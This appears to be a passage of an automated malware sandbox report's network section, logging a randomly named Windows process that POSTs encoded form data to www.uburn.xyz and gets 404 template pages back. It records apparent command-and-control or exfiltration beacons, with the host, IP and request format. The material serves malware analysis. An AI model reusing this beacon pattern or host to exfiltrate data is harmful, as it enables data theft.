                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 7a 6e 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /znmp/ was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.44974667.223.117.189801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:08.550878048 CEST731OUTPOST /unks/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.uburn.xyz
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.uburn.xyz
                      Referer: http://www.uburn.xyz/unks/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 52 66 4a 70 31 2b 74 43 4c 63 61 6a 63 6e 6b 4b 50 72 78 74 52 41 6a 67 37 39 70 50 2b 46 45 52 57 61 4c 47 49 33 77 70 4f 62 38 62 4c 39 4f 43 42 30 34 71 4d 4f 78 33 38 6c 61 6b 6a 30 57 64 79 67 59 7a 68 2b 37 4d 79 38 5a 31 30 53 37 78 32 4e 42 38 52 47 79 74 41 64 51 47 32 50 61 7a 4e 2f 66 65 70 42 6f 32 30 4f 34 6c 64 2f 59 62 2f 78 75 55 4f 67 72 6d 65 44 33 71 57 55 45 64 4c 46 2b 59 38 77 34 6b 52 61 43 32 69 70 74 4a 2f 45 62 59 52 79 67 67 59 45 44 34 41 47 54 50 67 70 69 2b 6b 47 71 48 71 2b 53 54 6e 51 68 58 6f 59 75 77 37 6c 65 57 4e 6f 2f 70 4f 68 5a 49 50 67 3d 3d
                      Data Ascii: 4rl8h=RfJp1+tCLcajcnkKPrxtRAjg79pP+FERWaLGI3wpOb8bL9OCB04qMOx38lakj0WdygYzh+7My8Z10S7x2NB8RGytAdQG2PazN/fepBo20O4ld/Yb/xuUOgrmeD3qWUEdLF+Y8w4kRaC2iptJ/EbYRyggYED4AGTPgpi+kGqHq+STnQhXoYuw7leWNo/pOhZIPg==
                      Sep 22, 2024 18:03:09.133240938 CEST1236INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:09 GMT
                      Server: Apache
                      X-Frame-Options: SAMEORIGIN
                      Content-Length: 32106
                      X-XSS-Protection: 1; mode=block
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                      Sep 22, 2024 18:03:09.133482933 CEST224INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                      Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ...
                      Sep 22, 2024 18:03:09.133624077 CEST1236INData Raw: 20 4f 57 4c 20 43 41 52 4f 55 53 45 4c 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22
                      Data Ascii: OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="
                      Sep 22, 2024 18:03:09.134390116 CEST1236INData Raw: 69 64 3d 22 6a 75 2d 6c 6f 61 64 69 6e 67 2d 73 63 72 65 65 6e 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20
                      Data Ascii: id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color
                      Sep 22, 2024 18:03:09.134406090 CEST1236INData Raw: 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: /images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables
                      Sep 22, 2024 18:03:09.136065006 CEST672INData Raw: 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74
                      Data Ascii: r" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-
                      Sep 22, 2024 18:03:09.136080980 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                      Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                      Sep 22, 2024 18:03:09.136094093 CEST224INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                      Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                      Sep 22, 2024 18:03:09.137487888 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22
                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li>
                      Sep 22, 2024 18:03:09.137505054 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22
                      Data Ascii: <li><a class="dropdown-item" href="header2-dark.html">Header 2 Dark</a></li> </ul> </li
                      Sep 22, 2024 18:03:09.138355970 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                      Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.44974767.223.117.189801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:11.097505093 CEST751OUTPOST /unks/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.uburn.xyz
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 222
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.uburn.xyz
                      Referer: http://www.uburn.xyz/unks/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 52 66 4a 70 31 2b 74 43 4c 63 61 6a 61 45 73 4b 4e 4d 4e 74 45 77 6a 68 2b 39 70 50 33 6c 46 59 57 61 48 47 49 7a 68 73 4f 49 49 62 49 5a 4b 43 4f 51 55 71 50 4f 78 33 6b 56 61 62 2b 6b 57 4b 79 67 46 54 68 38 76 4d 79 38 4e 31 30 54 4c 78 78 2b 5a 2f 52 57 79 76 4a 39 51 49 72 66 61 7a 4e 2f 66 65 70 41 59 51 30 4f 41 6c 65 50 49 62 74 41 75 58 4e 67 72 6c 4f 54 33 71 53 55 45 5a 4c 46 2b 75 38 79 64 78 52 65 79 32 69 72 31 4a 2f 57 7a 58 47 69 67 6d 53 6b 44 70 48 6b 48 4c 68 34 72 51 74 58 72 6a 73 65 4b 44 72 32 77 4e 35 70 50 6e 70 6c 36 6c 51 76 32 64 44 69 6b 42 55 69 62 44 2b 4b 69 67 46 43 36 48 6f 7a 6a 70 30 48 34 43 30 64 55 3d
                      Data Ascii: 4rl8h=RfJp1+tCLcajaEsKNMNtEwjh+9pP3lFYWaHGIzhsOIIbIZKCOQUqPOx3kVab+kWKygFTh8vMy8N10TLxx+Z/RWyvJ9QIrfazN/fepAYQ0OAlePIbtAuXNgrlOT3qSUEZLF+u8ydxRey2ir1J/WzXGigmSkDpHkHLh4rQtXrjseKDr2wN5pPnpl6lQv2dDikBUibD+KigFC6Hozjp0H4C0dU=
                      Sep 22, 2024 18:03:11.691978931 CEST1236INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:11 GMT
                      Server: Apache
                      X-Frame-Options: SAMEORIGIN
                      Content-Length: 32106
                      X-XSS-Protection: 1; mode=block
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                      Sep 22, 2024 18:03:11.692131042 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                      Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                      Sep 22, 2024 18:03:11.692145109 CEST448INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                      Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                      Sep 22, 2024 18:03:11.692856073 CEST1236INData Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                      Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                      Sep 22, 2024 18:03:11.692868948 CEST1236INData Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                      Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fabl
                      Sep 22, 2024 18:03:11.694027901 CEST448INData Raw: 6f 6e 20 74 65 78 74 2d 77 68 69 74 65 20 66 6f 6e 74 2d 31 36 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: on text-white font-16"></span> </button> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav">
                      Sep 22, 2024 18:03:11.694041967 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                      Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                      Sep 22, 2024 18:03:11.694052935 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                      Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                      Sep 22, 2024 18:03:11.695204973 CEST448INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                      Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                      Sep 22, 2024 18:03:11.695219040 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                      Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                      Sep 22, 2024 18:03:11.697043896 CEST1236INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                      Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.44974867.223.117.189801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:03:13.640140057 CEST10833OUTPOST /unks/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.uburn.xyz
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 10302
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.uburn.xyz
                      Referer: http://www.uburn.xyz/unks/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Data Raw: 34 72 6c 38 68 3d 52 66 4a 70 31 2b 74 43 4c 63 61 6a 61 45 73 4b 4e 4d 4e 74 45 77 6a 68 2b 39 70 50 33 6c 46 59 57 61 48 47 49 7a 68 73 4f 49 51 62 4c 73 65 43 42 52 55 71 4f 4f 78 33 36 6c 61 67 2b 6b 57 58 79 67 4e 4d 68 38 6a 36 79 2f 31 31 79 78 7a 78 30 50 5a 2f 66 57 79 76 4c 39 51 4a 32 50 61 63 4e 2f 50 61 70 41 6f 51 30 4f 41 6c 65 4b 45 62 36 42 75 58 42 41 72 6d 65 44 33 6d 57 55 46 2b 4c 46 6d 2b 38 79 49 4b 52 76 4f 32 69 49 4e 4a 73 31 62 58 5a 53 67 6b 52 6b 43 30 48 6b 61 56 68 38 44 32 74 58 65 47 73 63 57 44 6f 43 31 73 6a 4b 58 2f 37 33 57 69 4e 66 57 4f 4f 79 78 4e 4e 45 37 68 32 37 71 6b 5a 68 4b 55 6c 77 47 67 76 30 31 59 67 6f 69 79 73 37 4a 62 4a 45 43 67 46 44 51 4d 37 38 6f 69 72 36 41 30 55 6a 6c 56 4c 74 57 4b 77 57 4f 4a 75 54 34 79 73 4b 49 7a 4f 6b 59 46 4f 56 55 65 46 2f 31 47 6f 57 69 50 2f 73 48 2f 6f 34 76 64 79 61 6c 77 49 48 36 36 5a 33 33 52 37 36 76 69 6f 37 63 61 44 78 75 51 78 6f 65 32 6b 54 76 6f 70 66 49 68 76 51 4a 6a 4b 69 44 69 6c 72 75 76 36 51 6e 4b [TRUNCATED]
                      Data Ascii: 4rl8h=RfJp1+tCLcajaEsKNMNtEwjh+9pP3lFYWaHGIzhsOIQbLseCBRUqOOx36lag+kWXygNMh8j6y/11yxzx0PZ/fWyvL9QJ2PacN/PapAoQ0OAleKEb6BuXBArmeD3mWUF+LFm+8yIKRvO2iINJs1bXZSgkRkC0HkaVh8D2tXeGscWDoC1sjKX/73WiNfWOOyxNNE7h27qkZhKUlwGgv01Ygoiys7JbJECgFDQM78oir6A0UjlVLtWKwWOJuT4ysKIzOkYFOVUeF/1GoWiP/sH/o4vdyalwIH66Z33R76vio7caDxuQxoe2kTvopfIhvQJjKiDilruv6QnKwpswVvjIPCvU4jv+XQZoMuJLd8XVdcJUKJf3MG/JCgs/gA418ltulewg2Mmy6TYOJPWCAoSoxdBo7iTJ+RMc2Daz1S+18f1psXWZ8EwOWN3CakfX2mkGO7GA91bhWpFCkKEgsDByHLc9HDkIeclvjHlACE6qrOObdDzpqwMq8C+PMxsReleUPWAUepC/73lY158Z/SPfavJaIgdbX6vUcD+EXVs7cTJuLjgHC4dzxKq5GBVLYfmaDMi1Rpn2Zck7isNU8jQnnCHOa/+kXafZiBheLW3R20Ibm+49HIRrh5fW+Bkfi18uFo8z2eKBntaDO8XVYWNwnsVvIyk4KkEtcvxfTBgvXAQNXntyKyDDYMfIUdH7wm82QQgpw9rJQ5mIJMS26TV1AgvcXqh6ouU51U/om85p0oajWIAqTtSBNhZ0yvg2kVLzQwu2WlxwUbHnfP6SprTqkvLj/GtD7oPBjSL39MjmQUM4tflK+umguig8Eg4uWYne8st1ym2owju3VpLOkhqbUEem3TljxtFyzD8OlUh9l0noi1dg4aM43iLZajsdUQdRpyjJdLnFSvwYCkFn33aSrSKE+SSQwZSyS485BwQHfmH+nvws0RVj6u+hAHn1F0vQCQqkhGBdFhoKljFRQlo4fBdfRoG+oR3+5HqRU8gnbINjAK [TRUNCATED]
                      Sep 22, 2024 18:03:14.289649010 CEST1236INHTTP/1.1 404 Not Found
                      Date: Sun, 22 Sep 2024 16:03:14 GMT
                      Server: Apache
                      X-Frame-Options: SAMEORIGIN
                      Content-Length: 32106
                      X-XSS-Protection: 1; mode=block
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
